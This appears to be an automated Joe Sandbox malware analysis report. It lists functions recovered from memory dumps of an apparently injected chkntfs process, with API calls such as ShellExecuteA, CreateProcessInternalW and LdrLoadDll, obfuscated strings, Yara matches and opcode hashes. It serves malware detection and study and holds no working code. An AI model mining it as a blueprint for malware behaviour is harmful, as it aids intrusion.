                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c3a556170fd9866f12d7d55a3423d6fa8c8365f33848f935062ca74da9cf1792
                                                    • Instruction ID: 87cf1f150992cc0fbf00a6fb7d4875d90e1768b3328939eb26ff707b3127597f
                                                    • Opcode Fuzzy Hash: c3a556170fd9866f12d7d55a3423d6fa8c8365f33848f935062ca74da9cf1792
                                                    • Instruction Fuzzy Hash: EA90026120181417F5407558490560700058BD0306F55C611A7079555E8E29DDD56136
                                                    Function 04812FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6e3bfb97cbe01ce6337c23c78eec1da619bba5416e41a44c1ba3457c931010a2
                                                    • Instruction ID: 18e6a06c35dcbccaa0cf817ef8c0d7895e8717d48a196cfecbe54e8a3305f34c
                                                    • Opcode Fuzzy Hash: 6e3bfb97cbe01ce6337c23c78eec1da619bba5416e41a44c1ba3457c931010a2
                                                    • Instruction Fuzzy Hash: 47900221601410566540716889459064005AFE1215755C721A59AD550D8959D9E95666
                                                    Function 04812FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fc20d9bccde2ed371211542444dfb6b049b68f7f41d68f64917626c0ea0de724
                                                    • Instruction ID: 02544b9f4f2c2d5df4cd4e570eb4d078c17b17c65e3e7868be980d0bd97a4338
                                                    • Opcode Fuzzy Hash: fc20d9bccde2ed371211542444dfb6b049b68f7f41d68f64917626c0ea0de724
                                                    • Instruction Fuzzy Hash: 93900221211C1056F60075684D15B0700058BD0307F55C715A5169554CCD15D9E55522
                                                    Function 04812F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d49e21be13eb7adf5da59dffbf81eed76b47db7dc33cc216c18ec3834928aacc
                                                    • Instruction ID: e576edb884733d7881dca0f321e8034f1128b2eed50786f9cb6a24935e4f5086
                                                    • Opcode Fuzzy Hash: d49e21be13eb7adf5da59dffbf81eed76b47db7dc33cc216c18ec3834928aacc
                                                    • Instruction Fuzzy Hash: B690026134141456F50071584515B060005CBE1305F55C615E6079554D8A19DDD66127
                                                    Function 04812AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5c4262b40e89d52194ff8ed407af5a20c97e09a77a1a46c166df7e6708b86b91
                                                    • Instruction ID: dfc01ec46f64844205d37dc4e70387d5625a389cfb3edb631b97905bd191953b
                                                    • Opcode Fuzzy Hash: 5c4262b40e89d52194ff8ed407af5a20c97e09a77a1a46c166df7e6708b86b91
                                                    • Instruction Fuzzy Hash: 1E900225211410172505B558070550700468BD5355355C621F602A550CDA21D9E55122
                                                    Function 04812AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d1cce6585ebcbd7ee04d617177dfcfea6dee56066d85007e4a1ee99cad580ae2
                                                    • Instruction ID: 4d20dda273352a907ce004217f393253c5fc85d9ffca68240df8269a3f5cf310
                                                    • Opcode Fuzzy Hash: d1cce6585ebcbd7ee04d617177dfcfea6dee56066d85007e4a1ee99cad580ae2
                                                    • Instruction Fuzzy Hash: 1B900225221410162545B558070550B04459BD6355395C615F642B590CCA21D9E95322
                                                    Function 04812BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3a011576f363a660807bd0f382e43ba026f4db48dbc1a10f8f0924daefbe9be6
                                                    • Instruction ID: 362e72797a334509c6378ca0abded43773d95b759b7ceff1d031862bf99c63ca
                                                    • Opcode Fuzzy Hash: 3a011576f363a660807bd0f382e43ba026f4db48dbc1a10f8f0924daefbe9be6
                                                    • Instruction Fuzzy Hash: 3D90023160541816F5507158451574600058BD0305F55C611A5039654D8B55DBD976A2
                                                    Function 04812BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 906e99afafe5ce327f7d77d6d029152d5dccdc641cff1777ca5de75a8478489e
                                                    • Instruction ID: 898a048a638bcd76e82b71df55bd5e99195aabd5460903bd48fc2459a7211275
                                                    • Opcode Fuzzy Hash: 906e99afafe5ce327f7d77d6d029152d5dccdc641cff1777ca5de75a8478489e
                                                    • Instruction Fuzzy Hash: 1590023120545856F54071584505A4600158BD0309F55C611A5079694D9A25DED9B662
                                                    Function 04812BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e1ca381304777babe6fcae3970a8a6a70ff425eadda8e3ee3334842cfd54ca45
                                                    • Instruction ID: 0fa8c8e51fd45e7a0c98567ba9eeed6e8db44ebab51ee43dca9512f85b50a8d3
                                                    • Opcode Fuzzy Hash: e1ca381304777babe6fcae3970a8a6a70ff425eadda8e3ee3334842cfd54ca45
                                                    • Instruction Fuzzy Hash: BB90023120141816F5807158450564A00058BD1305F95C615A503A654DCE15DBDD77A2
                                                    Function 04812B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 25c3be095a639267740f2d796708423c687bb73c611b320f5b3d90b44bc52aef
                                                    • Instruction ID: a48176251d354aa54f97497057d0adbb7dc8c6df388f909a96504cc8b5755cfe
                                                    • Opcode Fuzzy Hash: 25c3be095a639267740f2d796708423c687bb73c611b320f5b3d90b44bc52aef
                                                    • Instruction Fuzzy Hash: 1290026120241017650571584515616400A8BE0205B55C621E6029590DC925D9D56126
                                                    Function 048135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 20858f25f0daf5da1e13003c6a1d87468dbafc8a6f50de7ceee360d82fec4efe
                                                    • Instruction ID: 9f5a17f684d2a913159fa466c01f1e864ff80baff6c83191a690088c5fad13ba
                                                    • Opcode Fuzzy Hash: 20858f25f0daf5da1e13003c6a1d87468dbafc8a6f50de7ceee360d82fec4efe
                                                    • Instruction Fuzzy Hash: 0A90023160551416F5007158461570610058BD0205F65CA11A5439568D8B95DAD565A3
                                                    Function 048139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 27b8939472b2b9c3ebf96720911fea43cdeef74cbd1fffa06723d5042dcd8218
                                                    • Instruction ID: 0d3eb9b9df6352a19d086134b536213e6e2b4356e7c68403a77cc3e8aea70c24
                                                    • Opcode Fuzzy Hash: 27b8939472b2b9c3ebf96720911fea43cdeef74cbd1fffa06723d5042dcd8218
                                                    • Instruction Fuzzy Hash: 0990022124546116F550715C45056164005ABE0205F55C621A5829594D8955D9D96222
                                                    Function 005A0AAA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 517 5a0aaa-5a0b1a call 5b9f50 call 5ba960 call 5a44a0 call 591410 call 5b1280 529 5a0b3a-5a0b40 517->529 530 5a0b1c-5a0b2b PostThreadMessageW 517->530 530->529 531 5a0b2d-5a0b37 530->531 531->529
                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 005A0B27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598
                                                    • Opcode ID: fa28baa004affc25a4cb80e5a05c300ff3f98dc204f87672a277779e583779b9
                                                    • Instruction ID: 12866a69500170a7227c978920efca6943775622bfba40d80a970def3becd1ed
                                                    • Opcode Fuzzy Hash: fa28baa004affc25a4cb80e5a05c300ff3f98dc204f87672a277779e583779b9
                                                    • Instruction Fuzzy Hash: 8201A5B1D4020D7AEB01A6E48DC1DEF7F6CEF81798F04C064FA04A7141D6785E0687B2
                                                    Function 005A0AB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 532 5a0ab0-5a0b1a call 5b9f50 call 5ba960 call 5a44a0 call 591410 call 5b1280 543 5a0b3a-5a0b40 532->543 544 5a0b1c-5a0b2b PostThreadMessageW 532->544 544->543 545 5a0b2d-5a0b37 544->545 545->543
                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 005A0B27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598
                                                    • Opcode ID: 4f7a5d3359a9b62937ad5d4ab0aef9ab282c29d12767233e39811ed79da463a8
                                                    • Instruction ID: f100ea5625d86d2da1fdee2d8ccc765a1b31bfe870f096e83186b54888ddd152
                                                    • Opcode Fuzzy Hash: 4f7a5d3359a9b62937ad5d4ab0aef9ab282c29d12767233e39811ed79da463a8
                                                    • Instruction Fuzzy Hash: 5001C871D0020D7AEB01A6E48C81DEF7F7CEF81798F04C064FA04A7141D6385E0687B1
                                                    Function 005B82D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 611 5b82d0-5b8311 call 5914a0 call 5b9070 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(005A16C9,?,3L[,005A16C9,005B4677,005B4C33,?,005A16C9,005B4677,00001000,?,?,005B9BA0), ref: 005B830C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: 3L[$wF[
                                                    • API String ID: 1279760036-399143487
                                                    • Opcode ID: a41fe5da80cc8374d2efab177e496b435cf0a5f4759d3770bfb9c2fb29cb7095
                                                    • Instruction ID: 7c153a955ed8dd3694a5027a94c235ec2a9919c7d08fc5742133cfd1f66c2519
                                                    • Opcode Fuzzy Hash: a41fe5da80cc8374d2efab177e496b435cf0a5f4759d3770bfb9c2fb29cb7095
                                                    • Instruction Fuzzy Hash: D5E06D752002197BDA10EE58DC49FDB37ADEFC9710F004419FA08A7242C670BC1087B8
                                                    Function 005B2B60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: 5f4d066e4897a0981a13aa425e22a221da12af008fdc21ef5f0c81aceef820d8
                                                    • Instruction ID: b17a5c79267f1c3dddba8baf0282b1621bedbd4d8bc4824751894e6f6d4ed855
                                                    • Opcode Fuzzy Hash: 5f4d066e4897a0981a13aa425e22a221da12af008fdc21ef5f0c81aceef820d8
                                                    • Instruction Fuzzy Hash: 13317CB1600705BBD714DF65D889FEBBFA8BB88700F00852DFA599B245D670BA44CFA1
                                                    Function 0059ECC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,0000000A), ref: 0059EDFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteShell
                                                    • String ID: """
                                                    • API String ID: 587946157-3059371096
                                                    • Opcode ID: e04e5d625679cf6f38f2ff2a79e11fe5b28f04f0bff42c915664732e5f63a1ea
                                                    • Instruction ID: de2351b0f8dabee422c3de79f368b80576c5880a0567f112170e2428577d0a80
                                                    • Opcode Fuzzy Hash: e04e5d625679cf6f38f2ff2a79e11fe5b28f04f0bff42c915664732e5f63a1ea
                                                    • Instruction Fuzzy Hash: 033153B280111DBAEB11EB948CC5EFF7B6CFB89354F044599F60DA2041EA356E088BB1
                                                    Function 005B83B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNEL32(?,?,?,00000000,S}Z,00000010,?,?,?,00000044,?,00000010,005A7D53,00000000,?,?), ref: 005B8413
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID: S}Z
                                                    • API String ID: 2186235152-2157246122
                                                    • Opcode ID: e5a2acfc8f1e20e90f50f1dd5e6a95613461734e6340639909a1a7953c24eb76
                                                    • Instruction ID: af6409ef7ccf8aaa711f0eba4d4c7c72cbfd51e5c4742ec421614c16b4afc4ba
                                                    • Opcode Fuzzy Hash: e5a2acfc8f1e20e90f50f1dd5e6a95613461734e6340639909a1a7953c24eb76
                                                    • Instruction Fuzzy Hash: CD01C0B2204509BFCB04DE89DC85EEB77ADAF8C754F008208BA09E3240D630F951CBA4
                                                    Function 005B8320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 005B835C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: Q2Z
                                                    • API String ID: 3298025750-4109463822
                                                    • Opcode ID: f267a55acd5952626e04455950c35b31330c2c9ae8cd531eafd55dd7d8fc67d3
                                                    • Instruction ID: c271d9f78d456e7b85094c34f4be51c1cbbf131000d2f4ad5aafe255ff507f69
                                                    • Opcode Fuzzy Hash: f267a55acd5952626e04455950c35b31330c2c9ae8cd531eafd55dd7d8fc67d3
                                                    • Instruction Fuzzy Hash: 95E06DB16002097BCA10EE58DC45FDB37ACEFC9710F004409FA09A7241C671B91087B8
                                                    Function 005A7B99 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00008003,?,?,005A19C0,005B6D97,005B4677,?), ref: 005A7BD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID: wF[
                                                    • API String ID: 2340568224-4100310840
                                                    • Opcode ID: bc488b57ef3d660bbdcc319c1d746e890a6467d78d3491510286cb530c5ebeb0
                                                    • Instruction ID: 1c0d7ff6908c2d88cd7d6fdf63f3f899887476c86ab26e5c0f67e4ab7ca4706b
                                                    • Opcode Fuzzy Hash: bc488b57ef3d660bbdcc319c1d746e890a6467d78d3491510286cb530c5ebeb0
                                                    • Instruction Fuzzy Hash: B0E0DFA064820A2BE640A2B58C1AF4A3E4C6F89B90F044068B54CDB282E858F10045B9
                                                    Function 005A7BA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00008003,?,?,005A19C0,005B6D97,005B4677,?), ref: 005A7BD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID: wF[
                                                    • API String ID: 2340568224-4100310840
                                                    • Opcode ID: 701914204e98bff1e1d784506a7173e220a0107e5947e4cc5f962c6595d7cba7
                                                    • Instruction ID: 5e2f6b12ac5c237e53da215c17cae9d270c0921faa5302810ba890a38e2fdabe
                                                    • Opcode Fuzzy Hash: 701914204e98bff1e1d784506a7173e220a0107e5947e4cc5f962c6595d7cba7
                                                    • Instruction Fuzzy Hash: 94D0176164420A2BFA50A6A59D0AF5A3A8C6B88B94F044464B94CDA282E869F5004579
                                                    Function 005AEBF5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 005AEC17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID: @J7<
                                                    • API String ID: 2538663250-2016760708
                                                    • Opcode ID: 2c4fe764d5938cfaa252f86c8222203c8488f1377dc188ae658f93807b45aad8
                                                    • Instruction ID: 2c43102d28c1d130751814c46eb0025dd81840a6e2dcdbfcb571304b48920b05
                                                    • Opcode Fuzzy Hash: 2c4fe764d5938cfaa252f86c8222203c8488f1377dc188ae658f93807b45aad8
                                                    • Instruction Fuzzy Hash: F3316FB5A0060AAFDB00DFD8D8819EEB7B9FF89314F108559E905EB215D771EE41CBA0
                                                    Function 005AEC00 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 005AEC17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID: @J7<
                                                    • API String ID: 2538663250-2016760708
                                                    • Opcode ID: c99ecc0a2f96777a0884cc5dee3c7b19dd3b612fb0f434e2cf31175a0a2ff015
                                                    • Instruction ID: fb1788fafe0e7bb86d8d670b56526c9ff51c00f8e5e277f6380c5dd38c1f9946
                                                    • Opcode Fuzzy Hash: c99ecc0a2f96777a0884cc5dee3c7b19dd3b612fb0f434e2cf31175a0a2ff015
                                                    • Instruction Fuzzy Hash: 71313EB5A0060AAFDB00DFD8C8819EFB7B9BF89314F108559E905EB214D775EE45CBA0
                                                    Function 005A44A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005A4512
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 60649801836bbc3b7d335e88a05832327e3b5b3953f5200478c210aca565a30d
                                                    • Instruction ID: 481ab653431ea566f28ba126eee86a52be526299886bc08579ad4951636241bb
                                                    • Opcode Fuzzy Hash: 60649801836bbc3b7d335e88a05832327e3b5b3953f5200478c210aca565a30d
                                                    • Instruction Fuzzy Hash: 8F0112B5D4020EBBDF10EAE4DC46FDDB7B8AB55308F004195E91897181F675EB14CB51
